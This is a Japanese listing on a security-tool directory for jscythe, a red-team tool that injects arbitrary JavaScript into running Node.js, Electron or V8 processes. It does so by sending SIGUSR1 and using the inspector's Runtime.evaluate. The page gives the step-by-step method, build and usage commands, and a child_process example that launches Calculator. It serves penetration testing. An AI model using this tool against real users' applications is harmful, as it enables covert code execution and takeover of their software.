Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
jscythe — node.js inspector メカニズムを悪用して、任意の node.js/electron/v8 ベースのプロセスに任意の javascript コードを実行させる。 | Kitploit
ツール/GitHubGitHub/evilsocket/jscythe
エクスプロイトポストエクスプロイトレッドチーミングリモートアクセスツール
GitHubevilsocket/jscythe

jscythe

node.js inspector メカニズムを悪用して、任意の node.js/electron/v8 ベースのプロセスに任意の javascript コードを実行させる。

リポジトリを見る
331241年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

jscytheは、Node.jsのインスペクタメカニズムを悪用して、デバッグ機能が無効になっているNode.js/Electron/V8ベースのプロセスに任意のJavaScriptコードを強制的に実行させます。

vscode

Visual Studio Code、Discord、あらゆるNode.jsアプリケーションなどでテスト済みで動作します。

方法

  1. ターゲットプロセスを見つける。
  2. プロセスにSIGUSR1シグナルを送信する。これにより、デバッガがポート上で有効になる(ソフトウェアによってはランダムな場合もあれば、そうでない場合もある)。
  3. SIGUSR1送信前後のオープンポートを比較してデバッグポートを特定する。
  4. http://localhost:<port>/jsonからWebSocketデバッグURLとセッションIDを取得する。
  5. 提供されたコードを含むRuntime.evaluateリクエストを送信する。
  6. 完了。

ビルド

root@kitploit:~
cargo build --release

実行

特定のプロセスを指定し、基本的な式を実行する:

root@kitploit:~
./target/release/jscythe --pid 666 --code "5 - 3 + 2"

ファイルからコードを実行する:

root@kitploit:~
./target/release/jscythe --pid 666 --script example_script.js

example_script.jsでは、任意のNodeモジュールをrequireし、以下のような任意のコードを実行できます:

root@kitploit:~
require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout

式でプロセスを検索する:

root@kitploit:~
./target/release/jscythe --search extensionHost --script example_script.js

その他のオプション

全オプションの一覧はjscythe --helpを実行してください。

ライセンス

このプロジェクトは♥を込めて@evilsocketによって作られ、GPL3ライセンスの下で公開されています。

ツールをダウンロード